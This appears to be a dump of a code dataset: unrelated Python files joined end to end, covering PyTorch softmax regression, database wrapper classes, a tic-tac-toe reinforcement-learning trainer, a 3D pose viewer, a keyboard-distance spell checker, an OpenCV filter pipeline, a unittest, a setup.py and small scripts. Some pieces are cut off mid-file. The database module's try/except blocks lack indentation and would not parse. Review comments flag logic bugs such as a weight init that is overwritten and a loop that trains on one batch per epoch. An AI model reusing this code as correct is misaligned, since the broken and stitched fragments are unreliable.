        ("linear",torch.nn.Linear(num_inputs,num_outputs))
    ])
)
torch.nn.init.normal_(softmax_regression.linear.weight,mean=0,std=0.01)
# NOTE(review): this constant_ overwrites the normal_ weight init directly
# above; it was probably meant for the bias — confirm.
torch.nn.init.constant_(softmax_regression.linear.weight,val=0.01)
criterion=torch.nn.CrossEntropyLoss()
optimizer=torch.optim.SGD(softmax_regression.parameters(),lr=0.01)
for epoch in range(epochs):
    for batch_idx,(feature_in_on_batch,label_in_one_batch) in enumerate(train_loader):
        logits=softmax_regression(feature_in_on_batch)
        loss=criterion(logits,label_in_one_batch)
        # NOTE(review): breaks after the first batch, so each epoch performs
        # exactly one optimizer step on one batch — confirm intent.
        break
    optimizer.zero_grad()
    loss.backward()
    optimizer.step()
    # if batch_idx % 100==0:
    #     print("Train Epoch: {} [{}/{}({:0f}%)]\tLoss: {:6f}".format(epoch,batch_idx*len(feature_in_on_batch),len(train_loader.dataset),100.*batch_idx/len(train_loader),loss.item()))
# Evaluation (on the training loader — see note above).
test_loss=0
correct=0
for data,target in test_loader:
    logits=softmax_regression(data)
    test_loss+=criterion(logits,target).item()
    pred=logits.data.max(1)[1]
    # target is one-hot: recover the class index column via nonzero.
    correct+=pred.eq(torch.nonzero(target.data)[:,1]).sum()
test_loss/=len(test_loader.dataset)
print("\nTest set: Average loss: {:.4f}, Accuracy: {}/{}({:.3f}%)".
      format(test_loss,correct,
             len(test_loader.dataset),
             100.*correct/len(test_loader.dataset)))
# In[]
summary(softmax_regression,(1,2))
# /usr/bin/env python
# -*- coding: utf-8 -*-
def ErrorMessage(modulename=None):
    """Print the standard "missing module" help text for *modulename*."""
    lines = (
        f'Import Can\'t Module "{modulename}"',
        'Read the .md file',
        'pip -r requirements.txt',
    )
    for line in lines:
        print(line)
import inspect,sqlite3
# load module
from py.sheet.sheet import *
try:
# PostgreSQL
import psycopg2
except ModuleNotFoundError as e:
ErrorMessage('psycopg2')
exit()
try:
# MySQL
import pymysql
except ModuleNotFoundError as e:
ErrorMessage('MySQLdb')
exit()
from py.sql import *
class Database(ForSQL):
    """
    Base class holding connection-independent settings (db type, db name,
    host/port, user credentials) shared by the concrete backends below.
    """
    __package__='__database__'
    # Default install layout; document_root is filled via setInstallDir().
    __install__={
        'document_root':'',
        'directory':['/database/']
    }
    __config__={}
    def __init__(self, dbtype=None, dbname=None):
        self.setType(dbtype)
        self.setDatabaseName(dbname)
        super().__init__()
    def className(self):
        # Name of the concrete subclass, e.g. 'SelectSQLite3'.
        return self.__class__.__name__
    def __config(self):
        # Overridden by subclasses to populate __config__.
        pass
    def get(self):
        # Current backend configuration dict.
        return self.__config__
    def getType(self):
        return self.dbtype
    def setType(self,types):
        self.dbtype=types
    def getPackage(self):
        # NOTE(review): reads the name-mangled instance attribute set only
        # by setPackage() — NOT the class attribute __package__; raises
        # AttributeError when setPackage() was never called.
        return self.__package
    def setPackage(self,**package):
        self.__package=package
    def getHost(self):
        return self.host
    def setHost(self,host=None):
        self.host=host
    def getPort(self):
        return self.port
    def setPort(self,port=None):
        self.port=port
    def getDatabase(self):
        # NOTE(review): returns the db *type* (same as getType), not a
        # connection — confirm naming.
        return self.dbtype
    def getDatabaseName(self):
        return self.dbname
    def setDatabaseName(self,name):
        self.dbname=name
    def access(self, dbname):
        # Placeholder: always yields None; subclasses manage connections.
        self.conn=None
        return self.conn
    def getInstallDir(self):
        return self.__install__['document_root']
    def setInstallDir(self,document_root='./data'):
        self.__install__['document_root']=document_root
    def isPgSQL(self):
        return False
    def isMySQL(self):
        return False
    def isSQLite(self):
        return False
    def asStoredText(self):
        # True only for the plain-file backend.
        return False
    def getUser(self):
        # (user, password) tuple as set by setUser().
        return (self.__user,self.__password)
    def setUser(self,user=(None,None)):
        (self.__user,self.__password)=user
######################################################################################################
class FileinFlask(Database):
    """# Non Database
    Plain-text "backend": stores data in a file instead of a database.
    - getFile / setFile: manage the target filename
    - saveCsv / saveExcel: serialize column/row data (currently stubs)
    - save: write text to the configured file
    """
    __package__='__file__'
    __config__={}
    matrixData=[]
    def __init__(self,dbtype=False,dbname='sample.txt'):
        super().__init__(dbtype,dbname)
        self.setFile(dbname)
    def __config(self):
        # Describe this backend: no real database, text storage only.
        self.__config__['notdb']=self.isNonDB()
        self.__config__['sqlite']=False
        self.__config__['pgsql']=False
        self.__config__['psql']=False
        self.__config__['dbname']=None
        self.__config__['dbtype']='text'
    def isNonDB(self):
        return True
    def asStoredText(self):
        return True
    def getFile(self):
        return self.filename
    def setFile(self,filename='sample.csv'):
        self.filename=filename
    def saveCsv(self,column=[]):
        # TODO: serialize `column` to CSV; currently writes an empty file.
        text=''
        self.save(text)
    def saveExcel(self,colmun=[]):
        # TODO: serialize (x:column, y:row) data; currently writes an
        # empty file.
        text=''
        self.save(text)
    def save(self,text=''):
        """Write ``text`` to the configured file (truncating)."""
        # BUGFIX: was `fwrite(text)` — an undefined name that raised
        # NameError on every call; write through the file handle instead.
        with open(self.getFile(),'wt') as fp:
            fp.write(text)
    def asExcel(self):
        # NOTE(review): fetches the filename but does nothing with it yet.
        file=self.getFile()
class SelectSQLite3(Database):
    """
    SQLite backend: verifies connectivity at construction time via test()
    and exits the process on failure.
    """
    __package__='__sqlite__'
    __config__={}
    def __init__(self,dbtype=None,dbname=None):
        super().__init__(dbtype,dbname)
        if dbname is None:
            print('database name is not found.')
            exit()
        self.setType(dbtype)
        self.setDatabaseName(dbname)
        if self.test() is False:
            print('+ Database Test is Failed.')
            exit()
    def isSQLite(self):
        return True
    def sqlite_config(self):
        return self.__config__
    def __config(self):
        self.__config__['sqlite']=self.isSQLite()
        self.__config__['dbname']=self.getDatabaseName()
        self.__config__['dbtype']=self.getType()
    def createDatabase(self):
        # sqlite3.connect() creates the file on demand; nothing to do here.
        pass
    def test(self):
        """Return the sqlite version rows (truthy) or False on failure."""
        self.__connect()
        cur=self.__cursor().execute('select sqlite_version();')
        response=cur.fetchall()
        self.__close()
        if len(response) > 0:
            return response
        return False
    def __connect(self):
        # Open (and create if missing) the configured database file.
        self.connection=None
        self.connection=sqlite3.connect(self.getDatabaseName())
    def __cursor(self):
        return self.connection.cursor()
    def __close(self):
        self.connection.close()
class SelectPgSQL(Database):
    """
    PostgreSQL backend (psycopg2).

    Install (homebrew):
        $ brew install postgresql
        $ brew services (start | stop) postgresql
    psql basics:
        $ psql --help
        $ psql -d postgres -U [username] -W
        > \\h              help
        > \\dt             table info
        > select version();  -- installed postgres version
        > \\q              quit
    """
    __package__='__pgsql__'
    __config__={}
    def __init__(self,dbtype=None,dbname='sample_pgsql',**kwargs):
        super().__init__(dbtype,dbname)
        # Optional keyword overrides with sensible defaults.
        try:
            self.setHost(kwargs['host'])
        except KeyError:
            self.setHost('localhost')
        try:
            self.setUser(kwargs['user'])
        except KeyError:
            self.setUser((None,None))
        try:
            self.setPort(kwargs['port'])
        except KeyError:
            self.setPort(5432)
        self.setType(dbtype)
        self.setDatabaseName(dbname)
        self.__config()
    def isPgSQL(self):
        return True
    def pg_config(self):
        return self.__config__
    def __config(self):
        # Snapshot all connection settings into the config dict.
        self.__config__['pgsql']=self.isPgSQL()
        self.__config__['user']=self.getUser()
        self.__config__['host']=self.getHost()
        self.__config__['port']=self.getPort()
        self.__config__['dbname']=self.getDatabaseName()
        self.__config__['dbtype']=self.getType()
        return self.__config__
    def __test(self):
        """Connectivity probe: print server version, True on success.

        NOTE(review): except ModuleNotFoundError will not catch psycopg2
        connection failures (OperationalError) — confirm intent.
        """
        try:
            self.__connect()
            cur=self.__cursor()
            cur.execute('select version();')
            print(cur.fetchall())
            self.__close()
            return True
        except ModuleNotFoundError:
            print('Database connection failed.')
            return False
    def __connect(self):
        usertext=''
        try:
            (user,password)=self.getUser()
            if user is not None:
                usertext=f' user={user}'
                # NOTE(review): `is not None or != ''` is always True (even
                # for password=None, producing "password=None") — probably
                # meant `and`; confirm.
                if password is not None or password!='':
                    usertext+=f' password={password}'
        except AttributeError:
            print('Postgres User is not set.')
        self.connection=psycopg2.connect(f'host={self.getHost()} dbname={self.getDatabaseName()}{usertext}')
        return self.connection
    def __cursor(self):
        return self.connection.cursor()
    def __close(self):
        self.connection.close()
| 7,476 | 2,249 |
from TabularTrainer import *
from RandomPlayer import *
from TicTacToe import *
import matplotlib.pyplot as plt
# Map a flat action index 0..8 to its (row, col) cell on the 3x3 board.
action_to_coordinate = {0: (0, 0), 1: (0, 1), 2: (0, 2),
                        3: (1, 0), 4: (1, 1), 5: (1, 2),
                        6: (2, 0), 7: (2, 1), 8: (2, 2)}
# A "battle" is a batch of games; totals below drive the result plot.
NUM_OF_BATTLES = 10
NUM_OF_GAMES = 50
#NOTE: tried to keep anything updating the board in this tile so we could use the TicTacToe functions
class Training:
    """
    Runs batches ("battles") of TicTacToe games between two agents, tracks
    per-battle win/draw percentages, and plots them at the end.
    """
    def begin_training(self, number_of_battles = NUM_OF_BATTLES):
        """Play ``number_of_battles`` battles, then plot the aggregates."""
        print("training started")
        # Have own while loop to play game
        agent1_wins = []
        agent2_wins = []
        draws = []
        count = []
        counter = 0
        for i in range(0, number_of_battles):
            print("battle " + str(i))
            agent1Win, agent2Win, draw = self.battleRounds()
            # Convert raw counts to percentages of this battle's games.
            agent1_wins.append((agent1Win / (agent1Win + agent2Win + draw)) * 100)
            agent2_wins.append((agent2Win / (agent1Win + agent2Win + draw)) * 100)
            draws.append((draw / (agent1Win + agent2Win + draw)) * 100)
            counter = counter + 1
            # x-axis: cumulative number of games played so far.
            count.append(counter * NUM_OF_GAMES)
        self.visualize_training_results(count, agent1_wins, agent2_wins, draws)
        print("training ended")
    def battleRounds(self, number_of_games = NUM_OF_GAMES):
        """
        Play ``number_of_games`` games between a TabularTrainer ('O') and a
        RandomPlayer ('X'); returns (agent1 wins, agent2 wins, draws).
        """
        agent1 = TabularTrainer('O', 'Agent 1')
        #agent2 = TabularTrainer('X', 'Agent 2')
        agent2 = RandomPlayer('X', 'Agent 2')
        agent1WinCount = 0
        agent2WinCount = 0
        drawCount = 0
        for i in range(0, number_of_games):
            print("game " + str(i))
            winner = self.playGame(agent1, agent2, number_of_games)
            if winner == 1:
                # Persist the learner's table only after a win.
                if isinstance(agent1, TabularTrainer):
                    agent1.save_to_file()
                    agent1.historic_data.clear()
                agent1WinCount += 1
            elif winner == 2:
                if isinstance(agent2, TabularTrainer):
                    agent2.save_to_file()
                    agent2.historic_data.clear()
                agent2WinCount += 1
            else:
                drawCount += 1
        return agent1WinCount, agent2WinCount, drawCount
    def playGame(self, agent1, agent2, number_of_games) -> int:
        """
        Play one game, agents alternating moves; returns 1, 2, or 0 (draw).
        NOTE(review): ``number_of_games`` is unused here.
        """
        game = TicTacToe(agent1, agent2)
        finished = False
        while not finished:
            finished = self.evaluateMove(agent1, game)
            if finished:
                break
            else:
                finished = self.evaluateMove(agent2, game)
                if finished:
                    break
        game.determine_winner()
        winner = self.get_game_results(game, agent1, agent2)
        return winner
    def evaluateMove(self, agent, game):
        """Apply ``agent``'s move; True when the game is over (or the
        agent returned -1, i.e. no move available)."""
        move = agent.move(game.game_board)
        if move == -1:
            return True
        coord = action_to_coordinate[move]
        game.play_round(coord)
        game.game_board.setSpaceTaken(coord)
        finished = self.game_is_finished(game.get_board_grid())
        return finished
    def game_is_finished(self, board):
        """
        True when any row, column, or diagonal is completed by one player.
        NOTE(review): the first check flags an all-zero (empty) board as
        finished — likely meant `board != 0` (full board / draw); confirm.
        """
        game_over = False
        if np.all((board == 0)):
            game_over = True
        # Rows.
        if (board[0, 0] > 0) and (board[0, 0] == board[0, 1] == board[0, 2]):
            game_over = True
        if (board[1, 0] > 0) and (board[1, 0] == board[1, 1] == board[1, 2]):
            game_over = True
        if (board[2, 0] > 0) and (board[2, 0] == board[2, 1] == board[2, 2]):
            game_over = True
        # Diagonals.
        if (board[0, 0] > 0) and (board[0, 0] == board[1, 1] == board[2, 2]):
            game_over = True
        if (board[0, 2] > 0) and (board[0, 2] == board[1, 1] == board[2, 0]):
            game_over = True
        # Columns.
        if (board[0, 0] > 0) and (board[0, 0] == board[1, 0] == board[2, 0]):
            game_over = True
        if (board[0, 1] > 0) and (board[0, 1] == board[1, 1] == board[2, 1]):
            game_over = True
        if (board[0, 2] > 0) and (board[0, 2] == board[1, 2] == board[2, 2]):
            game_over = True
        return game_over
    def get_game_results(self, game, agent1, agent2) -> int:
        """
        Report win/loss/tie to any TabularTrainer involved and return the
        winner code (1, 2, or 0 for a tie).
        NOTE(review): ``higher_q_values`` is computed but never used or
        returned — confirm intent.
        """
        winner = 0
        if game.game_won:
            if game.winning_player == game.player_one:
                if isinstance(agent1, TabularTrainer):
                    agent1.result("won")
                if isinstance(agent2, TabularTrainer):
                    agent2.result("loss")
                winner = 1
            else:
                if isinstance(agent1, TabularTrainer):
                    agent1.result("loss")
                if isinstance(agent2, TabularTrainer):
                    agent2.result("won")
                winner = 2
        elif game.tie_game:
            if isinstance(agent1, TabularTrainer):
                agent1.result("tie")
            if isinstance(agent2, TabularTrainer):
                agent2.result("tie")
        #Tabular Trainer against itself
        if isinstance(agent2, TabularTrainer) and isinstance(agent1, TabularTrainer):
            higher_q_values = self.see_who_has_higher_qvalues(agent1.final_q_values, agent2.final_q_values)
        #Tabular Trainer against RandomPlayer
        if isinstance(agent2, RandomPlayer):
            higher_q_values = agent1.final_q_values
        if isinstance(agent1, RandomPlayer):
            higher_q_values = agent2.final_q_values
        return winner
    def see_who_has_higher_qvalues(self, agent1_q_values, agent2_q_values):
        """Return whichever agent's q-value table has the larger sum
        (agent 1's on a tie)."""
        agent1 = 0.0
        agent2 = 0.0
        for i in range(0, len(agent1_q_values)):
            agent1 += agent1_q_values[i]
            agent2 += agent2_q_values[i]
        if agent1 > agent2:
            return agent1_q_values
        elif agent1 < agent2:
            return agent2_q_values
        # Default would be if the q values are equal
        return agent1_q_values
    #Plot the number of games each agent wins and ties
    def visualize_training_results(self, gameNum, agent1_wins, agent2_wins, draws):
        """Plot per-battle win/draw percentages against games played."""
        plt.plot(gameNum, agent1_wins)
        plt.plot(gameNum, agent2_wins)
        plt.plot(gameNum, draws)
        plt.title('Battle Round Metrics')
        plt.legend(['Agent 1 Wins', 'Agent 2 Wins', 'Draws'])
        plt.xlabel('Number of Games')
        plt.ylabel('Percentage of Agent Wins or Draws')
        plt.show()
| 6,543 | 2,164 |
import os
import sys
from core.math_tool.coordinate_system import CoordSys
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import cv2
def _update_element(obj, data, is_Point=False):
    """Push new coordinates into a matplotlib 3D line/point artist.

    ``data`` is a single (x, y, z) triple when ``is_Point`` is True,
    otherwise an (N, 3) array of points.
    """
    if not is_Point:
        obj.set_data(data[:, 0], data[:, 1])
        obj.set_3d_properties(data[:, 2], zdir="z")
    else:
        obj.set_data(data[0], data[1])
        obj.set_3d_properties(data[2], zdir="z")
def _update(obj_list, data, length=100):
    """Refresh a frame's four artists (center point plus x/y/z axis
    segments) from ``data`` (an object with center/x_axis/y_axis/z_axis)."""
    pos = data.center
    # One (2, 3) segment per axis: from the center to center + dir * length.
    segments = [
        np.array([pos, pos + direction * length])
        for direction in (data.x_axis, data.y_axis, data.z_axis)
    ]
    _update_element(obj_list[0], pos, is_Point=True)
    for artist, segment in zip(obj_list[1:4], segments):
        _update_element(artist, segment)
def visualize_3d(ref_,pred_,truth=None,user_exit=False):
    """
    Live 3D visualization loop: repeatedly redraws the predicted (and
    optionally ground-truth) coordinate frames. ``ref_`` and ``pred_`` are
    read as ref_[0] / pred_[0] each pass, so another thread can swap in
    fresh data.

    NOTE(review): loops forever; the ``continue`` on missing data busy
    spins, and ``user_exit`` is a constant argument re-checked every pass —
    confirm how exit is intended to work.
    """
    # Plot Configure
    plt.ion()
    fig = plt.figure(figsize=(8, 8))
    ax = fig.add_subplot(111, projection='3d') # Axe3D object
    ax.set_xlabel('$x$',); ax.set_ylabel('$y$'); ax.set_zlabel('$z$')
    ax.view_init(elev=120, azim=60)
    # NOTE(review): Axes3D.dist is deprecated in recent matplotlib — confirm.
    ax.dist = 10
    r_start, r_end = -1,1
    # Static axis segments: +-400 in x/y, 0..800 in z.
    x_axis_, y_axis_, z_axis_ = np.array([[-400,0,0],[400,0,0]]), np.array([[0,-400,0],[0,400,0]]), np.array([[0,0,0],[0,0,800]])
    # Reference Object (green markers + rgb axis lines)
    visRefPoints, = ax.plot(range(r_start,r_end),
                            range(r_start,r_end),
                            range(r_start,r_end),
                            alpha=1, linestyle="", marker=".", c='g')
    visRefAxisX, = ax.plot(x_axis_[:,0], x_axis_[:,1], x_axis_[:,2],alpha=0.6, c='r')
    visRefAxisY, = ax.plot(y_axis_[:,0], y_axis_[:,1], y_axis_[:,2],alpha=0.6, c='g')
    visRefAxisZ, = ax.plot(z_axis_[:,0], z_axis_[:,1], z_axis_[:,2],alpha=0.6, c='b')
    # Phone Object (predicted pose, red markers)
    visPredPoints, = ax.plot(range(r_start,r_end),
                             range(r_start,r_end),
                             range(r_start,r_end),
                             alpha=0.6, linestyle="", marker=".", c='r')
    visPredAxisX, = ax.plot(x_axis_[:,0], x_axis_[:,1], x_axis_[:,2],alpha=0.6, c='r')
    visPredAxisY, = ax.plot(y_axis_[:,0], y_axis_[:,1], y_axis_[:,2],alpha=0.6, c='g')
    visPredAxisZ, = ax.plot(z_axis_[:,0], z_axis_[:,1], z_axis_[:,2],alpha=0.6, c='b')
    # Ground-truth object (blue markers), only updated when truth is given.
    visTruthPoints, = ax.plot(range(r_start,r_end),
                              range(r_start,r_end),
                              range(r_start,r_end),
                              alpha=0.6, linestyle="", marker=".", c='b')
    visTruthAxisX, = ax.plot(x_axis_[:,0], x_axis_[:,1], x_axis_[:,2],alpha=0.6, c='r')
    visTruthAxisY, = ax.plot(y_axis_[:,0], y_axis_[:,1], y_axis_[:,2],alpha=0.6, c='g')
    visTruthAxisZ, = ax.plot(z_axis_[:,0], z_axis_[:,1], z_axis_[:,2],alpha=0.6, c='b')
    # Visualization Object List: [points, x-axis, y-axis, z-axis] each.
    ref_vis = [visRefPoints, visRefAxisX, visRefAxisY, visRefAxisZ]
    pred_vis = [visPredPoints, visPredAxisX, visPredAxisY, visPredAxisZ]
    truth_vis = [visTruthPoints, visTruthAxisX, visTruthAxisY, visTruthAxisZ]
    while True:
        ref,pred = ref_[0],pred_[0]
        if ref is None or pred is None:
            continue
        if user_exit:
            exit()
        # _update(ref_vis,ref,length=800)
        _update(pred_vis,pred)
        if not truth is None:
            _update(truth_vis,truth)
        fig.canvas.draw()
        fig.canvas.flush_events()
# -*- coding: utf-8 -*-
from .utils import exists, nlargest, removeMultiple
from .spell import Spell
class KeyboardSpell(Spell):
    """
    Spell checker that scores candidate corrections with a keyboard-aware
    Damerau-Levenshtein distance: edits cost more the farther apart the
    keys involved sit on the configured keyboard layout.
    """
    def __init__(self, spelldic=None, corpusfile=None, suffixfile=None, language=None, encoding=None, keyboardlayoutfile=None, weightObjFun=None):
        # call the parent constructor
        Spell.__init__(self, spelldic, corpusfile, suffixfile, language, encoding)
        self.load_keyboard_layout(keyboardlayoutfile)
        self.set_weightObjFun(weightObjFun)
    @classmethod
    def from_file(cls, spelldic=None, corpusfile=None, suffixfile=None, language=None, encoding=None, keyboardlayoutfile=None, weightObjFun=None):
        """Alternate constructor mirroring __init__'s signature."""
        return cls(spelldic, corpusfile, suffixfile, language, encoding, keyboardlayoutfile, weightObjFun)
    def set_weightObjFun(self, weight):
        """Set the (frequency, distance) objective weights; must sum to 1.
        None selects the default (0.5, 0.5)."""
        if weight is None:
            self.weightObjFun = (0.5, 0.5)
        else:
            if sum(weight) != 1:
                raise TypeError("Weights do not sum 1.")
            self.weightObjFun = weight
    def load_keyboard_layout(self, keyboardlayoutfile):
        """
        Read keyboard layout from JSON file or text file (in the latter
        case performing a literal evaluation of the python string).

        Args:
            keyboardlayoutfile: layout file in JSON format or python syntax.

        NOTE(review): when keyboardlayoutfile is None, self.kblayout is
        never assigned, so later access raises AttributeError instead of
        the "keyboard is empty" Exception below — confirm.
        """
        import json
        if keyboardlayoutfile is not None:
            if keyboardlayoutfile.endswith('.json'):
                with open(keyboardlayoutfile, 'r') as f:
                    self.kblayout = json.load(f)
            else:
                import ast
                with open(keyboardlayoutfile, 'r') as f:
                    self.kblayout = ast.literal_eval(f.read())
    def getCharacterCoord(self, c):
        """
        Finds a 2-tuple representing c's position on the given keyboard
        array (first matching sub-layout wins). If the character is not in
        the given array, throws a ValueError.
        """
        row = -1
        column = -1
        if self.kblayout is None:
            raise Exception("Speller keyboard is empty!")
        for kb in self.kblayout:
            for r in kb:
                if c in r:
                    row = kb.index(r)
                    column = r.index(c)
                    return (row, column)
        raise ValueError(c + " not found in given keyboard layout")
    def typoDistance(self, s, t, saturation=1000):
        """
        Finds the typo Manhattan distance (an integer) between two
        characters, based on the keyboard layout. The distance is capped
        at ``saturation``.
        """
        # add one if one is lowercase and other is not (shift diff)
        addShiftDiff = int( s.islower() != t.islower() )
        sc = self.getCharacterCoord(s.lower())
        tc = self.getCharacterCoord(t.lower())
        return min( sum( [abs(x-y) for x,y in zip(sc,tc)] ) + addShiftDiff, saturation)
    def keyboard_damerau_levenshtein_distance(self, s1, s2, saturation=4):
        """
        Damerau-Levenshtein distance with keyboard-aware costs: the
        substitution cost is the keyboard distance between the two keys;
        insertion/deletion cost is the minimum distance between the
        inserted/deleted key and its neighbors in the same string.
        """
        d = {}
        lenstr1 = len(s1)
        lenstr2 = len(s2)
        # Border rows/columns of the DP table.
        for i in range(-1,lenstr1+1):
            d[(i,-1)] = i+1
        for j in range(-1,lenstr2+1):
            d[(-1,j)] = j+1
        for i in range(lenstr1):
            for j in range(lenstr2):
                if s1[i] == s2[j]:
                    cost = 0
                else:
                    cost = self.typoDistance(s1[i], s2[j], saturation=saturation)
                # 10 acts as "no neighbor" fallback at string edges.
                delcost = min( self.typoDistance(s1[i], s1[i-1], saturation=saturation) if i > 0 and i < lenstr1 else 10,
                               self.typoDistance(s1[i], s1[i+1], saturation=saturation) if i > -1 and i < lenstr1-1 else 10
                               )
                inscost = min( self.typoDistance(s2[j], s2[j-1], saturation=saturation) if j > 0 and j < lenstr2 else 10,
                               self.typoDistance(s2[j], s2[j+1], saturation=saturation) if j > -1 and j < lenstr2-1 else 10
                               )
                d[(i,j)] = min(
                    d[(i-1,j)] + delcost, # deletion
                    d[(i,j-1)] + inscost, # insertion
                    d[(i-1,j-1)] + cost, # substitution
                )
                if i and j and s1[i]==s2[j-1] and s1[i-1] == s2[j]:
                    d[(i,j)] = min (d[(i,j)], d[i-2,j-2] + cost) # transposition
        return d[lenstr1-1,lenstr2-1]
    def ObjectiveFunction(self, candidate, word, saturation=4):
        """
        Score ``candidate`` as a correction of ``word``: a weighted balance
        of the candidate's normalized corpus log-frequency and its keyboard
        typing distance from the misspelled word:

            w0 * log(f/m)/log(M/m) - w1 * log(d)/log(d_max)

        NOTE(review): log10, self.WORDS, self.m and self.M are presumably
        provided by the Spell base class/module — confirm they are in scope.
        """
        if self.weightObjFun[1] > 0:
            d = self.keyboard_damerau_levenshtein_distance(candidate, word, saturation)
            maxdist = saturation*max(len(candidate),len(word))
            if candidate in self.WORDS:
                return self.weightObjFun[0]*(log10(float(self.WORDS[candidate])/self.m) / log10(float(self.M)/self.m)) - self.weightObjFun[1]*(log10(float(d)) / log10(maxdist))
            else:
                # Unknown word: score by (negative) distance alone.
                return -d
            # NOTE(review): unreachable — both branches above return.
            return Spell.ObjectiveFunction(self, candidate, word)
        else:
            return super(KeyboardSpell,self).ObjectiveFunction(candidate, word)
        # NOTE(review): unreachable.
        return self.P(candidate)
| 7,134 | 2,212 |
# encoding: UTF-8
import cv2
import numpy as np
class ImFilterPipeline:
    """
    Toggleable image-augmentation pipeline: filter() applies each stage
    whose flag in ``_pipeline`` is set to 1, in a fixed order.
    """
    def __init__(self):
        # init pipeline: all stages disabled (0) by default.
        self._pipeline = {
            "rotated": 0,
            "blur": 0,
            "gaussianBlur": 0,
            "resize": 0
        }
    @property
    def pipeline(self):
        # Mutable stage-flag dict; callers flip entries to 1 to enable.
        return self._pipeline
    def _rotate_bound_with_white_background(self, image, angle):
        """
        Copy from imutils.rotate_bound. Change background color from
        (0,0,0) to (255,255,255).
        :param image: image
        :param angle: angle from 0 ~ 360
        :return: rotated image, enlarged so no corner is clipped
        """
        # grab the dimensions of the image and then determine the
        # center
        (h, w) = image.shape[:2]
        (cX, cY) = (w / 2, h / 2)
        # grab the rotation matrix (applying the negative of the
        # angle to rotate clockwise), then grab the sine and cosine
        # (i.e., the rotation components of the matrix)
        M = cv2.getRotationMatrix2D((cX, cY), -angle, 1.0)
        cos = np.abs(M[0, 0])
        sin = np.abs(M[0, 1])
        # compute the new bounding dimensions of the image
        nW = int((h * sin) + (w * cos))
        nH = int((h * cos) + (w * sin))
        # adjust the rotation matrix to take into account translation
        M[0, 2] += (nW / 2) - cX
        M[1, 2] += (nH / 2) - cY
        # perform the actual rotation and return the image
        return cv2.warpAffine(image, M, (nW, nH), borderValue=(255, 255, 255))
    def _blur(self, image, ksize=(5, 5)):
        # Simple box blur.
        return cv2.blur(image, ksize)
    def _gaussianBlur(self, image, ksize=(5, 5), sigmaX=0):
        return cv2.GaussianBlur(image, ksize, sigmaX)
    def _resize(self, image, target_size=64):
        # Square resize to target_size x target_size.
        return cv2.resize(image, (target_size, target_size))
    def filter(self, image):
        """Apply every enabled stage in fixed order; returns the result."""
        rtn = image
        if self._pipeline["rotated"] == 1:
            # NOTE(review): np.random.choice(..., 1) yields a 1-element
            # array, not a scalar angle — newer OpenCV may reject it;
            # confirm.
            rtn = self._rotate_bound_with_white_background(rtn, np.random.choice(np.arange(0, 360), 1))
        if self._pipeline["blur"] == 1:
            rtn = self._blur(rtn)
        if self._pipeline["gaussianBlur"] == 1:
            rtn = self._gaussianBlur(rtn)
        if self._pipeline["resize"] == 1:
            rtn = self._resize(rtn)
        return rtn
| 2,262 | 794 |
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), "../../"))
import unittest
from karura.database_api import DatabaseAPI
class TestDatabaseAPI(unittest.TestCase):
    """Integration tests for DatabaseAPI against a disposable test database."""

    DBNAME = "test_database_uri"
    API = None

    @classmethod
    def setUpClass(cls):
        cls.API = DatabaseAPI(alternative_db=cls.DBNAME)
        cls.API.connect()

    @classmethod
    def tearDownClass(cls):
        # Drop the test database so repeated runs start clean.
        if cls.API is not None:
            cls.API.close(with_drop=True)

    def test_database(self):
        self.assertEqual(self.API._get_database().name, self.DBNAME)

    def test_user(self):
        domain = "karura31"
        user = "karura99"
        password = "karura@1010"
        gen_new = lambda: password + "__new_password"

        # Every invalid (domain, user, password) combination must be rejected.
        invalid_combos = [
            ("", "", ""),
            ("domain", "", ""),
            ("domain", "user", ""),
            ("domain", "", "password"),
            ("", "user", ""),
            ("", "user", "password"),
            ("domain", "user", "pas"),
            ("domain", "usr", "password"),
            ("domain", "usr", "pas"),
        ]
        for combo in invalid_combos:
            self.assertRaises(Exception, lambda c=combo: self.API.register_user(*c))

        # Happy path: register, authenticate, change password, re-auth, delete.
        user_obj = self.API.register_user(domain, user, password)
        self.assertTrue(user_obj)
        self.assertTrue(self.API.authenticate_user(domain, user, password))
        self.API.change_user_password(domain, user, password, gen_new())
        self.assertTrue(self.API.authenticate_user(domain, user, gen_new()))
        self.API.delete_user(domain, user, gen_new())


if __name__ == "__main__":
    unittest.main()
| 2,052 | 655 |
#!/usr/bin/python
import pandas as pd
import sys
def main():
    """Convert a semicolon-separated CSV (path in argv[1]) to BigBenchTimes.xlsx.

    Also echoes the full frame to stdout.
    """
    # fle_path = '/home/alex/workspace/ReportGen/python/BigBenchTimes.csv'
    file_path = sys.argv[1]
    df = pd.read_csv(file_path, sep=';')
    df.to_excel("BigBenchTimes.xlsx")
    # BUG FIX: `print df.to_string()` is Python 2 statement syntax and a
    # SyntaxError on Python 3; use the print function.
    print(df.to_string())


if __name__ == '__main__':
    main()
| 310 | 122 |
#!/usr/bin/env python
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
import nameparser
import os
def read(fname):
    """Return the text content of `fname`, resolved relative to this file's directory.

    BUG FIX: the original left the file handle open (resource leak); a
    with-block closes it deterministically.
    """
    with open(os.path.join(os.path.dirname(__file__), fname)) as fh:
        return fh.read()
# Long description comes straight from the README shipped with the package.
README = read('README.rst')

# Version/url/author metadata is sourced from the nameparser package itself
# so it lives in exactly one place.
setup(name='nameparser',
      packages = ['nameparser'],
      description = 'A simple Python module for parsing human names into their individual components.',
      long_description = README,
      version = nameparser.__version__,
      url = nameparser.__url__,
      author = nameparser.__author__,
      author_email = nameparser.__author_email__,
      license = nameparser.__license__,
      keywords = ['names','parser'],
      classifiers = [
          'Intended Audience :: Developers',
          'Operating System :: OS Independent',
          "License :: OSI Approved :: GNU Library or Lesser General Public License (LGPL)",
          'Programming Language :: Python',
          'Development Status :: 5 - Production/Stable',
          'Natural Language :: English',
          "Topic :: Software Development :: Libraries :: Python Modules",
          'Topic :: Text Processing :: Linguistic',
      ]
      )
| 1,225 | 328 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Jul 4 17:41:56 2018
@author: hubert kyeremateng-boateng
"""
import numpy as np
import pandas as pd
# Load the ARP dataset (no header row) and give the first column a name.
recipes = pd.read_csv('arp_dataset.csv', header=None)
recipes = recipes.rename(columns={0: 'name'})
# Print the transposed frame: one column per original row.
print(np.transpose(recipes))
import roll_dice as r #importing RollDice module
COUNT = 0  # number of successful rolls performed

# Interactive loop: read a direction, roll the dice that way, until 'quit'.
while True:
    roll = input("Enter your choice(d/u/l/r): ").lower()
    if roll in ('down', 'd'):
        r.dice_down(r.res)
